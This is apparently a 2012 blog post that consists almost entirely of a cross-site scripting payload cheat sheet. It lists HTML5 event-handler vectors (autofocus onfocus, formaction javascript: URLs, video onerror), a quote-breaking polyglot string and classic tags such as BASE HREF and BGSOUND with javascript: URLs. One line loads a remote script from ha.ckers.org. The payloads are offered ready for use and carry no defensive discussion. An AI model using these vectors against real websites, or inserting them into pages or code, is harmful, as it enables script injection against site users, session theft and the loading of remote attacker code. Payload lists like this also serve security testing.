Saturday, 15 September 2012

XSS Cheat Sheet! Including HTML 5 Vectors.

HTML5 Vectors -

Vectors by Gareth Heyes
Some vectors also from HTML5Sec
Regular Vectors from RSnake

HTML5 Web Applications
<input autofocus onfocus=alert(1)>
  -------------------------------------------------------------
<select autofocus onfocus=alert(1)>
  -------------------------------------------------------------
<textarea autofocus onfocus=alert(1)>

  -------------------------------------------------------------
<keygen autofocus onfocus=alert(1)>
  ------------------------------------------------------------- 
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>

  ------------------------------------------------------------- 
<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>

  -------------------------------------------------------------
<video onerror="javascript:alert(1)"><source></source></video>

  -------------------------------------------------------------
<form><button formaction="javascript:alert(1)">X</button> 
  -------------------------------------------------------------
<body oninput=alert(1)><input autofocus>

  -------------------------------------------------------------
<frameset onload=alert(1)
 
HTML Web Applications
 ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
  -------------------------------------------------------------
'';!--"<XSS>=&{()}
  -------------------------------------------------------------
<SCRIPT>alert('XSS')</SCRIPT>
  -------------------------------------------------------------
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
  -------------------------------------------------------------
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  -------------------------------------------------------------
<BASE HREF="javascript:alert('XSS');//">
  -------------------------------------------------------------
<BGSOUND SRC="javascript:alert('XSS');">
  -------------------------------------------------------------
<BODY BACKGROUND="javascript:alert('XSS');">
  -------------------------------------------------------------
<BODY ONLOAD=alert('XSS')>
 
The fuzzdb includes hundreds of XSS vectors.
